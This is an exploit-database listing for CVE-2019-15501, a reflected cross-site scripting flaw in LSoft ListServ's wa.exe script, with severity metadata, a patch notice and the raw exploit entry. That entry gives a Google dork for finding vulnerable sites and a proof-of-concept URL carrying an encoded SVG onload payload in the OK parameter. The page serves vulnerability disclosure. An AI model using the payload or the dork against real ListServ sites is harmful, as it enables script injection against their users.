header-logo
Suggest Exploit
vendor:
ListServ
by:
MTK
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: ListServ
Affected Version From: Older than Ver 16.5-2018a
Affected Version To: 16.5-2018a
Patch Exists: YES
Related CWE: CVE-2019-15501
CPE: a:lsoft:listserv
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: IIS 8.5/10.0 - Firefox/Windows
2019

LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)

The term Listserv has been used to refer to electronic mailing list software applications in general, but is more properly applied to a few early instances of such software, which allows a sender to send one email to the list, and then transparently sends it on to the addresses of the subscribers to the list. The vulnerability exists in the wa.exe script, which allows an attacker to inject malicious payloads into the OK parameter. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of LSoft ListServ.
Source

Exploit-DB raw data:

# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Softwae Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501

# Software description:
The term Listserv has been used to refer to electronic mailing list software applications in general, 
but is more properly applied to a few early instances of such software, which allows a sender to send one 
email to the list, and then transparently sends it on to the addresses of the subscribers to the list. 

# POC

1. 	http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
2.	http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>

# References:
1.	http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
2.	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501

Navigation

Suggest Exploit

Services By CQR